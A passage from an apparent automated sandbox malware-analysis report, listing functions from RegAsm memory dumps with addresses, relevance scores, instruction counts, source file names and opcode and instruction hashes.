                                                                                                                                                    • Instruction ID: e685b98f528260a6eb54e953b6e543c557cf21688e43a929b24b27abc6db153d
                                                                                                                                                    • Opcode Fuzzy Hash: 937869abe39facd442952179cbe41040cd6a823b833d22808ed862dc2f8fe55b
                                                                                                                                                    • Instruction Fuzzy Hash: 1CD182347007008FEB15AB65C858B397BB6FF8AB04F15845AEA02DB3A1CB75ED45CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D800B9 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2b8dc5943400012da2a51103f71531c92e927a5f876fbb724009dc6caff217bd
                                                                                                                                                    • Instruction ID: f3a0c328c1328753c9ace0e0f462474b30b9f05e5ad212bb59d55194990e25ae
                                                                                                                                                    • Opcode Fuzzy Hash: 2b8dc5943400012da2a51103f71531c92e927a5f876fbb724009dc6caff217bd
                                                                                                                                                    • Instruction Fuzzy Hash: 0FC16F347003049FEB15AB65C858B397BE6FF8AB00F15845AEA02DB3A1CB75ED45CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA48A8 Relevance: .3, Instructions: 282COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7231d041187715453ecab13fe10acb6af62393c3acdbde5ecf6afc0f01326d98
                                                                                                                                                    • Instruction ID: 1a9a012c15429d9096eb351679ad55b209dad7d7cd5b5ae823b33a263495bcf6
                                                                                                                                                    • Opcode Fuzzy Hash: 7231d041187715453ecab13fe10acb6af62393c3acdbde5ecf6afc0f01326d98
                                                                                                                                                    • Instruction Fuzzy Hash: 94B16C35B006048FDB15DF39C488E6ABBF2BF89205B1584A9E446DB375DB70EC06CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D83688 Relevance: .3, Instructions: 279COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: acedf9652426debd628f76ade6efed3c1b2f804b6cde3dbf50cbfe86fd584a61
                                                                                                                                                    • Instruction ID: 907f4e0cd58fd6625740603f68376cbf3ebd630ff7b9b6fcf0133b190b1c0f7f
                                                                                                                                                    • Opcode Fuzzy Hash: acedf9652426debd628f76ade6efed3c1b2f804b6cde3dbf50cbfe86fd584a61
                                                                                                                                                    • Instruction Fuzzy Hash: 27A16F35B002049FCB04DF69C894EAABBF2FF89710B158469E909EB3A1DB35ED45CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA7D58 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9243ae48d930c527a30f6fe00e4090c6c8802162b241a3610515f0566611af19
                                                                                                                                                    • Instruction ID: 3bd36a3423c8cb6f7fe79f26c3b69683fae242c6c752608a453178a5f11000e2
                                                                                                                                                    • Opcode Fuzzy Hash: 9243ae48d930c527a30f6fe00e4090c6c8802162b241a3610515f0566611af19
                                                                                                                                                    • Instruction Fuzzy Hash: 2A513672E003599FDB19CFA9C844B9EBBF6FF88310F14852AE415AB254DB749942CF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA59C8 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1a0467d230e8cfca0002e5071e21368eb4e2819ce0a925dacfef5ddda56168b8
                                                                                                                                                    • Instruction ID: 056bfbf945a5596c9f95570d7f44a05f1a7121c4a5b06964df624f2c7a1447dc
                                                                                                                                                    • Opcode Fuzzy Hash: 1a0467d230e8cfca0002e5071e21368eb4e2819ce0a925dacfef5ddda56168b8
                                                                                                                                                    • Instruction Fuzzy Hash: 61413936A00605DFCB14CF58D880EAABBF2FF89310B158A9AE5559B265D730F902CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA7D57 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5386c0e89dfa8e6d61305c791860aa29075666104a068294ce59e6053ff04ddf
                                                                                                                                                    • Instruction ID: f01bedd6a9ae6aaeb3234e3b257473ab4fdf558fc5e6b0308c69f3531d3acc14
                                                                                                                                                    • Opcode Fuzzy Hash: 5386c0e89dfa8e6d61305c791860aa29075666104a068294ce59e6053ff04ddf
                                                                                                                                                    • Instruction Fuzzy Hash: 14513671E00259DFDB29CFA9C985B9EBBF5FF48300F14852AE415AB284DB749946CF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA6E90 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 936d596647d34aa39f1a1817db0af1553e211ecb4df0b06e7f91f739d35da96a
                                                                                                                                                    • Instruction ID: 3e53fb3e9f5ede990828c3c1e54126dd73965611842265390adb666761ffb773
                                                                                                                                                    • Opcode Fuzzy Hash: 936d596647d34aa39f1a1817db0af1553e211ecb4df0b06e7f91f739d35da96a
                                                                                                                                                    • Instruction Fuzzy Hash: E7411875505F848FC725CF2AC480997FFF4AF99200B04896EE9DA87B22D270F905CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA5579 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 32ee64a62547912d6568df3bdd913ca6ed8814fe35c133ac15748a1a0fc887ad
                                                                                                                                                    • Instruction ID: 24074fc925ad00c3ca9106226fa011de1463f2e8f07c28a2b67f8d77b8fa1334
                                                                                                                                                    • Opcode Fuzzy Hash: 32ee64a62547912d6568df3bdd913ca6ed8814fe35c133ac15748a1a0fc887ad
                                                                                                                                                    • Instruction Fuzzy Hash: 12318075B012109FCF15DF34E84496EBBB2FF8A201B4484AAE905CB365DB31ED06CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA5588 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d6091aad4d36fe4b1c6a844ba63c4f89a794653ee6a4547ee6cc9c53b48f6ef0
                                                                                                                                                    • Instruction ID: db634f1450cb471be086904110fceaeeda80a565806d9bef8e09719c35a8e9cd
                                                                                                                                                    • Opcode Fuzzy Hash: d6091aad4d36fe4b1c6a844ba63c4f89a794653ee6a4547ee6cc9c53b48f6ef0
                                                                                                                                                    • Instruction Fuzzy Hash: 1A319C75B002109FCF15DF34E88496EBBB2FF8A241B448469E906CB365DB31ED06CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D8102F Relevance: .1, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 05890da85958479a9d7b0233acd78d34751ce7ef267b3bae73cc2d057f693d5a
                                                                                                                                                    • Instruction ID: 54aa4f0a79afaa3c040defabfe3799f9cbb87ce2ec2fc6cfc48efa2e0e86dfa2
                                                                                                                                                    • Opcode Fuzzy Hash: 05890da85958479a9d7b0233acd78d34751ce7ef267b3bae73cc2d057f693d5a
                                                                                                                                                    • Instruction Fuzzy Hash: 08312334B052409FDB05ABA9DC44A7ABBF7FF85210B15856BD016CB2E2CB34DC0ACB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA87A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ca48f1ed9470db94a77175e9440d53136dbf17c2d1ed4a967bd8043c590a705
                                                                                                                                                    • Instruction ID: a2447b4beb3cf28025a0dd97708757d4ef0a6350d9d925b14fe72e1be6d1921a
                                                                                                                                                    • Opcode Fuzzy Hash: 4ca48f1ed9470db94a77175e9440d53136dbf17c2d1ed4a967bd8043c590a705
                                                                                                                                                    • Instruction Fuzzy Hash: A94103B2D012489FDB14DFAAD944ADEFFB6AF88310F10802AE815A7250DB34A945CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8A98 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 71fe50b29cf57af6e96655d2593abe789652c12330fa1f61b10fbfe6d48baa60
                                                                                                                                                    • Instruction ID: 3a7b6e0dad01411fbfa274c3a3728b3f0893d4c58a2dbc0a8481eeedc5a17dd5
                                                                                                                                                    • Opcode Fuzzy Hash: 71fe50b29cf57af6e96655d2593abe789652c12330fa1f61b10fbfe6d48baa60
                                                                                                                                                    • Instruction Fuzzy Hash: 763112B2D012489FDB14CFA9D890BDEBBB5EF48311F14842AE809A7240CB74A846CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009DD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 274ba13264f90c449160f7b034f071facd40b4ed7d856e8ca6dc99a67d4c3043
                                                                                                                                                    • Instruction ID: 087f2905792bc3a8c83fa224e851c996753be7079ee49cdb678eb9177cbc4ef0
                                                                                                                                                    • Opcode Fuzzy Hash: 274ba13264f90c449160f7b034f071facd40b4ed7d856e8ca6dc99a67d4c3043
                                                                                                                                                    • Instruction Fuzzy Hash: 17210375685204DFDB14DF10D9C0B26BB69FB94324F24C56AD8090B3A6C33AE856CAA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009DD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b36ba3303194b1c662e8491c5ab47a68d332fff4696c8d8d1f23e70b6814aeca
                                                                                                                                                    • Instruction ID: 1c6f147cf33f080e537df22f07f09982c02af7606da25b2573b7d9698fea1ae7
                                                                                                                                                    • Opcode Fuzzy Hash: b36ba3303194b1c662e8491c5ab47a68d332fff4696c8d8d1f23e70b6814aeca
                                                                                                                                                    • Instruction Fuzzy Hash: A821F571585240DFDB15DF14E9C0B26BF65FB94328F24C56AE8090B35AC33AD856CBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA879F Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ec0e6a98b465e0a9dc30c6359bc562bbd94351d640f98ae1849ce459566359a8
                                                                                                                                                    • Instruction ID: ff6a2e78d01cb8bd6ca8fa25cc192d211911c6e38785ad4524073664287cc706
                                                                                                                                                    • Opcode Fuzzy Hash: ec0e6a98b465e0a9dc30c6359bc562bbd94351d640f98ae1849ce459566359a8
                                                                                                                                                    • Instruction Fuzzy Hash: CA3101B2D012489FDB14DFAAD944BDEBFF6AF48300F14802AE815BB250DB349945CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009ED01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432822659.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9ed000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 35a22889e43b47f8948f9a750f833c2b885877d5bb9740bb77c45a4d7951a7e8
                                                                                                                                                    • Instruction ID: aff2001405179e98a32a26d7aaf44c1b33a98a8e518864ad8ce3cc9ff11f33f6
                                                                                                                                                    • Opcode Fuzzy Hash: 35a22889e43b47f8948f9a750f833c2b885877d5bb9740bb77c45a4d7951a7e8
                                                                                                                                                    • Instruction Fuzzy Hash: 4E212271604380DFDB16DF10D9C4B26BB65FB84316F28C96DD8094B246C33ADC47CA62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8F43 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cc84b7052626bd2ebf0597bbc399c3a69623c337c72622a7d88ec08b75f5a047
                                                                                                                                                    • Instruction ID: c48b5fa945b0247a14a52c9930892373c0f0cc03cbb72aec96f34d3e9b54ae23
                                                                                                                                                    • Opcode Fuzzy Hash: cc84b7052626bd2ebf0597bbc399c3a69623c337c72622a7d88ec08b75f5a047
                                                                                                                                                    • Instruction Fuzzy Hash: 90313579D0424ADFCB14CFA8D484AEEBBB1FB49311F1044AAE915BB391D7345A81DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8A8C Relevance: .1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 913b0e1ee6d175cce621e0887f6b83207cdfa3c1747ed669edd37f5559efcf5d
                                                                                                                                                    • Instruction ID: 982ce28e271f3bb282eb89e54e3423a0313a49a351a88887a71796efad28ef02
                                                                                                                                                    • Opcode Fuzzy Hash: 913b0e1ee6d175cce621e0887f6b83207cdfa3c1747ed669edd37f5559efcf5d
                                                                                                                                                    • Instruction Fuzzy Hash: CB2125B2D053499FDB14CFA9C895BDEBBF9AF48311F14842AE805E7340CB749846CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC0BF Relevance: .1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1416132349509e76ad684f9446994eaa4b80b6d2e8d2144662bd370a92a21aee
                                                                                                                                                    • Instruction ID: 0e7e0d6139ff0ac0536b99845725aba5d0da5a660fa52cfcaa1f9af759ad60de
                                                                                                                                                    • Opcode Fuzzy Hash: 1416132349509e76ad684f9446994eaa4b80b6d2e8d2144662bd370a92a21aee
                                                                                                                                                    • Instruction Fuzzy Hash: 0711E9328167A05FE311E738E866BDB7FE5DFC1615F08005AE085CE241EA28A40EC7DA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009ED006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432822659.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9ed000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7bef3a43cda58ccd4b90e9ab377bf014721622c9a9a83835e411168b5578f498
                                                                                                                                                    • Instruction ID: 940b1ec8dda787f8982d5dd35996fc49e1fdc939447608aac0d668bf171d498f
                                                                                                                                                    • Opcode Fuzzy Hash: 7bef3a43cda58ccd4b90e9ab377bf014721622c9a9a83835e411168b5578f498
                                                                                                                                                    • Instruction Fuzzy Hash: DF218E755093C08FCB03CF24D990715BF71EB46315F28C5EAD8498B6A7C33A980ACB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009DD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
                                                                                                                                                    • Instruction ID: fd11cce9cbc5b8724631301c168b23d6c728a522339e1c415e6756ef2975ae17
                                                                                                                                                    • Opcode Fuzzy Hash: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
                                                                                                                                                    • Instruction Fuzzy Hash: 24112676544280CFCB15CF10D9C0B16BF71FB94328F24C6AAE8490B71AC336D856CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009DD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
                                                                                                                                                    • Instruction ID: 648800475c9de4e9991aaa65981d205f4cfdd7882c8e0a8182608b0bcefdf04b
                                                                                                                                                    • Opcode Fuzzy Hash: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
                                                                                                                                                    • Instruction Fuzzy Hash: 7D110376544280DFCB15CF00D9C0B16BF72FB94324F24C6AAD8090B766C33AE856CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DABC5F Relevance: .1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d3b5807a41e51cd6bf8179f872de270f0136d6fc78f87db1ca1349b6b51b147d
                                                                                                                                                    • Instruction ID: 5e54b4122237f64076b2c77729a50f6bd7d7e812dbad417993db70ee990922a8
                                                                                                                                                    • Opcode Fuzzy Hash: d3b5807a41e51cd6bf8179f872de270f0136d6fc78f87db1ca1349b6b51b147d
                                                                                                                                                    • Instruction Fuzzy Hash: 5801D6352102055FE394B730E85A77E7AABEFC1242B84882AE506CBB00DD387D0B87D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8350 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 438cf6875f969d285a891a61b6ffe4d89ea6812f6d257ff67ca2929d2551072d
                                                                                                                                                    • Instruction ID: 584a03a35310da63fb1db2b8ff4d9ed2546f9419b083f493071bbb4614e45312
                                                                                                                                                    • Opcode Fuzzy Hash: 438cf6875f969d285a891a61b6ffe4d89ea6812f6d257ff67ca2929d2551072d
                                                                                                                                                    • Instruction Fuzzy Hash: 3D017132B001199BDF14DEA9AC85ABFBBAAEBC4251B148036E605D3240DB30991597A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC499 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 303eb6d84cca041a861f5ea52c5eb785935a4349e2ad7ad37781a8b103d8f195
                                                                                                                                                    • Instruction ID: 018649c72944794c8fe7c81e4a38cbe2a7658613c2a7e81467851ea917fbef63
                                                                                                                                                    • Opcode Fuzzy Hash: 303eb6d84cca041a861f5ea52c5eb785935a4349e2ad7ad37781a8b103d8f195
